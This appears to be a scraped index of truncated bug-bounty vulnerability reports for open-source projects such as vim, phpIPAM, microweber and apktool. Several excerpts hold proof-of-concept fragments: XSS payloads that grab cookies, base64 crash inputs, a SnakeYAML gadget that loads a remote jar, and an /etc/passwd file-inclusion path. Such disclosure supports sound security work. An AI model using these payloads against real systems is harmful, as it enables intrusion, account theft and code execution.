Cross-site Scripting (XSS) - Stored in pimcore/pimcore

Description Cross site scripting vulnerability in pimcore,pimcore field, it is fixed in this commit 832c34 , but still it is executing xss .Icon field in events and news Proof of Concept 1 . Login to the demo account https://10.x-dev.pimcore.fun/admin/ 2. Go to settings --data objects -- classes ...

Exposure of Sensitive Information to an Unauthorized Actor in eventsource/eventsource

Exposure of Sensitive Information to an Unauthorized Actor in EventSource/eventsource Reported on Feb 6th 2022 | Timothee Desurmont Vulnerability type: CWE-200 Bug Cookies & Authorisation headers are leaked to external sites. Description When fetching an url with a link to an external site...

in clasp-developers/clasp

Description Clasp uses printf to log errors and useful information, in one instance of this logging - the printf call specifies format operators but lacks the appropriate arguments - leading to unrelated bytes being included in the output. Impact This vulnerability is capable of allowing an...

Server-Side Request Forgery (SSRF) in chocobozzz/peertube

Description First of all, Thanks to my friend Haxatron for his excellent report I read the fix commit, and I found out that the code only Checked the IP addresses and didn't check the domain names that refer to a private IP address Steps to reproduce first, set up a local server at 127.0.0.2:8000...

OS Command Injection in microweber/microweber

Description OS command injection also known as shell injection is a web security vulnerability that allows an attacker to execute arbitrary operating system OS commands on the server that is running an application, and typically fully compromise the application and all its data. Very often, an...

Cross-site Scripting (XSS) - Stored in livehelperchat/livehelperchat

Description LiveHelperChat is vulnerable to Stored XSS at the Message field in the Personal canned message tab of the User account page. Payload constructor.constructor'alert1' Steps to reproduce 1.Login then go to User account page https://demo.livehelperchat.com/siteadmin/user/account 2.Switch ...

Cross-site Scripting (XSS) - DOM in hakimel/reveal.js

Description The onmessage event listener in /plugin/notes/speaker-view.html does not check the origin of postMessage before adding the content to the webpage. The vulnerable code allows any origin to postMessage on the browser window and feeds attacker's input to parts using which attacker can...

Exposure of Sensitive Information to an Unauthorized Actor in cjferna/photo-services-mashup

Description Please enter a description of the vulnerability. Vulnerable URL: https://github.com/cjferna/Photo-Services-Mashup/blob/fdc12e0671e035bac00cc46ee67d456540444460/src/es/um/taw/rest/imagga/Imagga.java It contains sensitive API Keys and secret keys. Proof of Concept private final String U...

Cross-site Scripting (XSS) - Reflected in phpipam/phpipam

Description Cross-Site Scripting vulnerability which allows attackers to execute arbitrary javascript code in the browser of a victim which affected import Data set feature via a spreadSheet file upload. Proof of Concept Endpoint 1 POST http://HOST/app/admin/import-export/import-vlan-preview.php ...

in phpipam/phpipam

Description The phpIPAM 1.4.5 incorrectly assigns a privilege to a particular actor, creating an unintended sphere of control for that actor in the Import/Export feature. A normal user with the role of User could download XLS file of IP addresses, hostfile dump and export system database that...

in vim/vim

Description Floating point error in tabstopfromto. commit : 7676c158798a7c90f500cab2c12af0d47bad6026 Proof of Concept $ echo -ne "bm9ybTBvMDD/MDAwMDAwMDAwMDAwMDAwMDAwMApzaWwhbm9ybRZjMDAwCQpmdSBSZXRhYihnLG4p Cm8KZXhlInJldCJhOm4KZW5kZgpjYWwgbCgiIixSZXRhYigwLDQpCnNlIHRhYnN0b3A9NTAwMDAw...

Cross-site Scripting (XSS) - Stored in bytebase/bytebase

Description Hello there, there is a stored XSS in bytebase SQL editor. Proof of Concept 1. Install bytebase on your system. 2. Go to /sql-editor and create a new query with name 3. Go back to the /sql-editor and go to Queries tab and see that a pop up appears, indicating the XSS payload is...

Exposure of Sensitive Information to an Unauthorized Actor in transloadit/uppy

Description First thanks to my friend Haxatron for this awsome report I review the @uppy/companion code from the source to the sink, and I figure out a significant issue that makes any SSRF protection Effectless. I put myself as a Developer and started to read the companion document, and then I s...

in luigirizzo/netmap

Description In the Netmap source code, calls to DbgPrint; can be found to contain a formatting argument %p to be specific yet no argument, this would in most cases lead to nearby data being printed to the debug stream. Impact This vulnerability is capable of allowing an attacker to read data from...

Cross-site Scripting (XSS) - Stored in alanaktion/phproject

Description Stored Cross-Site Scripting XSS vulnerability due to the lack of content validation and output encoding. Then, the vulnerability can be triggered when the user previews the document´s content. Proof of Concept login and navigate task Dependencies This task depends on: This task is a...

Improper Authorization in phpipam/phpipam

Description In phpIPAM 1.4.5, a normal user with the role of Usercould view/read the log files via show-logs.php, errorlogs.php and accesslogs.php endpoints. It is supposedly accessible by the Administrator only. Proof of Concept Tested version: phpIPAM 1.4.5 Affected endpoints: 1 GET/POST...

in mruby/mruby

Description OOB read and OOB write in mrbarypush. commit : 903c5f978a2966465d8d5c6dfac55a977d134287 Proof of Concept bash $ echo -ne "bAticjWSUkRPTkxZC2I9e30MWyohMCxtOjAwLG06MF09MXxbKiEwLG0wXQo=" |base64 -d poc ASAN $ ./bin/mruby ./poc AddressSanitizer:DEADLYSIGNAL...

Improper Access Control in mautic/mautic

Description I couldn't find a suitable vulnerability type for this kind of issue, so this may be incorrect the default .htaccess file has some restrictions in the access to PHP files. Deny access via HTTP requests to all PHP files. Order deny,allow Deny from all ... Except those whitelisted bello...

Business Logic Errors in publify/publify

Description It was found that if a user tries to create an article, and want to make that article private, the functionality is not working. Proof of Concept 1. Create an article 2. Click on publish and you will see the option to visibility to make it private, but functionality is not designed...

Improper Access Control in phpipam/phpipam

Description In phpIPAM 1.4.5, a normal user with the role of User could download or export IP subnets that may contain sensitive information related data such as IP address, IP state, MAC, owner, hostname and device via export-subnet.php endpoint. The bug is the export-subnet.php should verify th...

in cortezaproject/corteza-server

Description During testing it was found that if a user revoke his all active session, then also user is able to make changes to his account. Proof of Concept 1. Log in to the application 2. Go to profilelogin sessions and revoke all sessions. 3. You will see that all other sessions are still vali...

Cross-site Scripting (XSS) - Stored in s-cart/s-cart

Description Stored XSS in S-Cart Version 6.8.3 affecting Product and Category module. Proof of Concept Product version: S-Cart Version 6.8.3 core 6.8.10 , https://github.com/s-cart/s-cart/releases/tag/v6.8.3 Vulnerability 1: Stored XSS In Product module 1 Endpoint: POST...

the function deepFromFlat of underscore.deep is vulnerable to prototype pollution

Prototype Pollution in Clever/underscore.deep Reported on Feb 2nd 2022 | Timothee Desurmont Description Vulnerability type: CWE-1321 Version 0.5.1 of underscore.deep is vulnerable to prototype pollution; the function deepFromFlat in underscore.deep.js do not check if the attribute resolves to the...

Improper Authorization in bytebase/bytebase

Description Hello bytebase team, there is an improper privilege management in bytebase source code. This allows a user to view another user inbox. Proof of Concept 1. Install bytebase, create new user user1and user2 2. Login as user1, go to this link /api/inbox?user=user-id and change user-id to ...

in gpac/gpac

Description Null Pointer Dereference in afrtboxread Proof of Concept echo AAAAEW1ldGFzXSAAAABkaXIAAAAAYWZydHRzdnB5dG/oAwBtAGwAAm0= | base64 -d poc gdb output bash pwndbg r -bt poc Starting program: /run/shm/gpac/bin/gcc/MP4Box -bt poc ERROR: Could not find ELF base! Thread debugging using...

in mruby/mruby

Description There is a NULL Pointer Dereference in ivfree src/variable.c:232:20. This bug has been found on mruby lastest commit hash 00f2b74ab2c1f03084908c815dcd0934f9fc702a on Ubuntu 20.04 for x8664/amd64. Proof of Concept 3.timese=0," =c= y:0,0 0" Steps to reproduce 1- Clone repo and build wit...

Command Injection in ibotpeaches/apktool

Description Arbitrary code execution when an APK is built with a malicious apktool.yml due to SnakeYAML's load function Proof of Concept 1: Modify apktool.yml somevar: !!javax.script.ScriptEngineManager !!java.net.URLClassLoader !!java.net.URL "http://127.0.0.1:8000/yaml-payload.jar" 2: Download...

in gpac/gpac

Description Null Pointer Dereference in gitnboxdel Proof of Concept bash echo -n AAAAEW1ldGEwMDAwMDAwMDAAAABjMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAAAAARZ2l0bjAwMDAwMDAwMA== | base64 -d poc ./MP4Box -bt ./poc...

None in vim/vim

Description Use After Free in enterbuffer function. commit : 5703310e640c4b142a16a3ea4f45317565ae8c32 Proof of Concept bash $ echo -ne "ZnUgUigpCiAgdGFiIGxvcAogIGxldCBsOj1nCiAgZQEKbGYKZW5kZgoKY2FsIGFzYWwoIiIsUigp KQpjYWwgYXNhbCgiIixSKCkpCmNhbCBhc2FsKCIiLFIoKSkKYnchCg==" | base64 -d poc ASAN $...

Cross-site Scripting (XSS) - Reflected in ptrofimov/beanstalk_console

Description Beanstalk Console is vulnerable to reflected Cross-Site Scripting via the server parameter. Steps to reproduce 1. Setup the Beanstalk console locally. 2. Go to https://localhost/public/? and add a random server. 3. Visit...

in alextselegidis/easyappointments

Description The software is a booking management system that has a public form to place bookings, and a private area for the calendar and management of services, users, settings, etc... There is a backend API that allows data manipulation, including listing the appointments for a specific time...

Cross-site Scripting (XSS) - Reflected in navigatecms/navigate-cms

Description Cross-Site Scripting is vulnerability which allows attackers to execute arbitrary javascript code in the browser of victim. Proof of Concept Parameter: id Payload: alertdocument.cookie Affected endpoints: On Firefox browser, visit: 1...

Cross-site Scripting (XSS) - Stored in s-cart/core

Description Multiple Stored XSS exists in S-Cart Version 6.8.4 and below leads to cookie stealing of any victim that visits the affected URL. This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie. Proof of Conce...

Improper Privilege Management in liangliangyy/djangoblog

Description Hi there, I would like to report an improper privilege management vulnerability in djangoblog source code. This would allow an attacker to create comment on behalf of anyone. Proof of Concept 1. Install a local instance of djangoblog, login as admin and create an article 2. Create a n...

Cross-site Scripting (XSS) - Stored in liangliangyy/djangoblog

Description Hi there, I would like to report a stored Cross Site Scripting vulnerability in djangoblog source code. Cross-site scripting also known as XSS is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. It allow...

in microweber/microweber

Description In the Microweber CMS, there are two endpoints that can be used together to get local file inclusion vulnerability. 1. /api/BackupV2/upload?src=/etc/passwd 2. /api/BackupV2/download?file=passwd When logged in as administrator, we can upload any readable file from the operating system...

Heap-based Buffer Overflow in vim/vim

Description Heap Overflow in exretab. This issue was created to separate the previous issue. This bug has already been fixed with patch 8.2.4245. Proof of Concept $ echo -ne "bm9ybTBvMDAwMDAwMDAwMDAwMDAwMDAwMDD/MJMwMDAKc2lsIW5vcm0WYxwwMAkwCmZ1IFJldGFi...

in radareorg/radare2

NULL pointer dereference in loadbuffer radare2 suffers from a NULL pointer dereference error in loadbuffer of binxnukernelcache.c Environment date Fri Jan 28 11:03:53 PST 2022 uname -ms Linux x8664 ./radare2 -v radare2 5.5.5 27531 @ linux-x86-64 git.5.5.4 commit:...

Cross-site Scripting (XSS) - Reflected in phpipam/phpipam

Description Reflected XSS attacks AKA non-persistent attacks when a malicious script is reflected off of a web application to the victim’s browser. The script is activated through a link, which sends a request to a website with a vulnerability that enables execution of malicious scripts. The...

Business Logic Errors in dolibarr/dolibarr

Description Dolibarr is vulnerable to Business Logic Errors in the Weight, Length x Width x Height, Area, Volume fields of a Product since these values can be negative numbers. Proof of Concept 1.After login, in the top menu bar, click Products 2.In the left menu bar, click List to view the list ...

Open Redirect in alanaktion/phproject

Description Open Redirect in Login page due to unchecked to parameter. Proof of Concept Send users the following link https://demo.phproject.org/login?to=//example.com After users use their registered account to login, they will be redirected to example.com Impact By modifying the URL value to a...

Open Redirect in alanaktion/phproject

Description Bypass open redirect protection Proof of Concept patch for this report https://huntr.dev/bounties/1183df1a-5243-42f9-a263-267b92444b03/ easily can be bypassed Bypass url https://demo.phproject.org/login?to=//example.com...

None in vim/vim

Description Use after free occurs in skipwhite function charset.c:1474. commit : 166788c657f4b1090a31ea37a023b1f2c78790c8 Proof of Concept $ echo -ne "ZnUgUmUwYTAoZyxuKQp+CnMvCnIwIzAKZW5kZgpzL1wlJykvXD1hMDAwKDAwMDAwMDAwMDAwMDAw MDAwMDAwMDAwMDAwMDAwMDAwLCBSZTBhMCgnJywwMDApMDA=" | base64 -d...

Heap-based Buffer Overflow in vim/vim

Description Heap-buffer-overflow on read in yankcopyline This issue was created to separate this one and was fixed with Patch 8.2.4219. Proof of Concept Steps to reproduce: echo -n c2lsIW5vcm0wbxSA/zAWenk= | base64 -d heapowpoc3 vim -u NONE -i NONE -n -X -Z -e -m -s -S heapowpoc3 -c :qa! Sanitize...

Cross-site Scripting (XSS) - Stored in livehelperchat/livehelperchat

Description Livehelperchat is vulnerable to stored cross site scripting. Proof of Concept 1 . Login to the demo account 2 . Go to settings -- Live help configuration --Visual settings for the visitor -- widget theme --new -- name field 3 . Add payload in name field and click save 4 . Go to settin...

Cross-site Scripting (XSS) - Stored in livehelperchat/livehelperchat

Description LiveHelperChat is vulnerable to Stored XSS at the Name and Surname fields in the User account page. Payload constructor.constructor'alert1' Steps to reproduce 1.Login then go to User account page https://demo.livehelperchat.com/siteadmin/user/account 2.In the Name and Surname fields,...

Business Logic Errors in crater-invoice/crater

Description It is found that comapny currency can not be changed since the field is disabled as shown in the screenshot but it can be changed by tampering the parameter. Proof of Concept Actual Request POST /api/v1/company/settings HTTP/1.1 Host: demo.craterapp.com User-Agent: Mozilla/5.0 Windows...

Cross-site Scripting (XSS) - Stored in microweber/microweber

Description Stored XSS occurs when changing a user's profile Proof of Concept txt XSS POC : "alertdocument.domain 1. Open the https://demo.microweber.org/demo/admin 2. Go to "Users" "Edit profile" 3. Change the value of "First Name" to XSS PoC 4. Refresh Impact Through this vulnerability, an...

in delgan/loguru

Description Loguru is vulnerable to log injection on all logging methods as it is possible to inject newlines "\n" which will create a new log entry in the logfile. This can lead to attackers tampering with logs and a loss of integrity of the log files as a result Proof of Concept from loguru...

Cross-Site Request Forgery (CSRF) in crater-invoice/crater

Description An attacker is able to log out a user if a logged-in user visits the attacker's website. Proof of Concept history.pushState'', '', '/' document.forms0.submit; Impact This vulnerability is capable of forging users to unintentional logout. More details One way GET could be abused here i...